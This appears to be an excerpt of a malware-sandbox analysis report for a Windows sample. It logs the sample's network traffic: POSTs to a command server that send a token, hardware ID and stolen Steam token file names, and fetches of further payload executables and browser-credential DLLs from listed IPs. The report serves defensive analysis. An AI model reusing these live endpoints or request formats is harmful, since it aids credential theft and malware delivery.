                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJJDGHJKKJEBFHJDBGHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBKHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="file"------IEBFHCAKFBGDHIDHIDBK--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJEGDAKEHJECAKEGDHJHost: 185.172.128.76Content-Length: 148851Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 31 38 31 38 31 36 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 2d 2d 0d 0a Data Ascii: ------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="message"1818166------EHJKJDGCGDAKFHIDBGCB--
                            Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                            Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
                            Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /1/Qg_Appv5.exe HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                            Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_00426504 __EH_prolog,SetThreadLocale,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,0_2_00426504
                            Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /1/Qg_Appv5.exe HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: unknownDNS traffic detected: queries for: note.padd.cn.com
                            Source: unknownHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 32 44 30 30 41 35 41 30 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"5F2D00A5A0C62507286958------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default10------AAEBAFBGIDHCBFHIECFC--
                            Source: u48o.0.exe, 0000000A.00000002.1687631765.000000000405E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllG
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllU
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dllc
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dllq
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll9
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php#
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php$
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php/
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php/m
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php3m1
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php7
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php8f03eaf3f74425202cfbbd470d578ult-release
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpB
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpMM
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpR
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpa
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpf
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phphm
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpk
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phps
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
                            Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpz
                            Source: u48o.0.exe, 0000000A.00000002.1687631765.000000000405E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76H
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
